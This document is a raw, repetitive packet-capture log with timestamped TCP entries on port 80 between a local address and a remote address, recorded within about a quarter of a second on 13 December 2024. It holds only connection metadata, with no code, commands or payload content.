                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.140922070 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.141006947 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.141016006 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.141043901 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.142314911 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.142358065 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.142389059 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.142587900 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.143356085 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.143450022 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.143488884 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.144553900 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.144674063 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.144751072 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.145771027 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.145838022 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.145854950 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.145893097 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.147003889 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.147052050 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.147063971 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.147088051 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.148241997 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.148303032 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.148340940 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.148385048 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.149461031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.149498940 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.149537086 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.149584055 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.150659084 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.150712013 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.150732040 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.150767088 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.151846886 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.151886940 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.151956081 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.152061939 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.153053045 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.153124094 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.153157949 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.153194904 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.154298067 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.154433012 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.154479980 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.155498028 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.155553102 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.155599117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.155639887 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.156755924 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.156821966 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.156835079 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.156855106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.157912970 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.157968044 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.158019066 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.158268929 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.159153938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.159218073 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.159260035 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.159343958 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.160339117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.160393000 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.160523891 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.160562992 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.161537886 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.161602020 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.161715031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.161753893 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.162806988 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.162875891 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.162897110 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.163000107 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.164007902 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.164062023 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.164098978 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.164141893 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.165329933 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.165371895 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.165384054 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.165421009 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.166433096 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.166471958 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.166555882 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.166608095 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.167643070 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.167684078 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.167761087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.167809010 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.169028044 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.169069052 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.169230938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.169394970 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.170073986 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.170121908 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.170156002 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.170278072 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.171277046 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.171328068 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.171365976 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.171518087 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.172503948 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.172554016 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.172576904 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.172590971 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.173712015 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.173753977 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.173831940 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.173974991 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.175008059 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.175065041 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.175142050 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.175182104 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.176157951 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.176213980 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.176244020 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.176341057 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.177412987 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.177505970 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.177545071 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.178638935 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.178745985 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.178802013 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.178802013 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.179790974 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.179913044 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.179956913 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.180025101 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.181030035 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.181134939 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.181178093 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.181246042 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.182281017 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.182399035 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.182431936 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.182727098 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.183432102 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.183511019 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.183546066 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.183587074 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.184775114 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.184848070 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.184851885 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.184915066 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.185874939 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.185928106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.185997009 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.186080933 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.187062025 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.187134027 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.315560102 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.315604925 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.315655947 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.315757990 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.316065073 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.316108942 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.316214085 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.316715956 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.317301035 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.317347050 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.317394972 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.317477942 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.318461895 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.318516970 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.318563938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.318665981 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.319641113 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.319698095 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.319742918 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.319807053 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.320847034 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.320904970 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.320930004 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.320971966 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.322107077 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.322164059 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.322180986 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.322218895 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.323343992 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.323420048 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.323451996 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.323496103 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.324455976 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.324510098 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.324532032 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.324717045 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.325771093 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.325825930 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.325894117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.325928926 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.327049017 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.327095032 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.327125072 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.327445030 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.328147888 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.328202963 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.328282118 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.329497099 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.329561949 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.329622030 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.329755068 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.330508947 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.330589056 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.330617905 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.330631971 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.331659079 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.331729889 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.331780910 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.332165003 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.333690882 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.333749056 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.333753109 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.333830118 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.334400892 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.334460974 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.334496975 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.334642887 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.335390091 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.335434914 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.335457087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.335639954 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.336677074 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.336718082 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.336973906 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.337743998 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.337838888 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.337852001 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.337878942 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.339006901 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.339029074 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.339091063 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.339091063 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.340116024 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.340204000 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.340209007 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.340245008 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.341279030 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.341324091 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.341372013 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.341417074 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.342478037 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.342535019 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.342612028 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.342778921 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.343686104 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.343758106 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.343895912 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.344861031 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.344902039 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.344986916 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.345037937 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.346072912 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.346164942 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.346323967 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.347357988 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.347419977 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.347456932 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.347934008 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.348639965 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.348711014 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.348752975 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.348789930 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.349705935 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.349770069 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.349805117 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.349879980 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.350873947 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.350925922 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.350996017 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.351059914 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.352065086 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:35.352117062 CET4981480192.168.2.4185.215.113.16
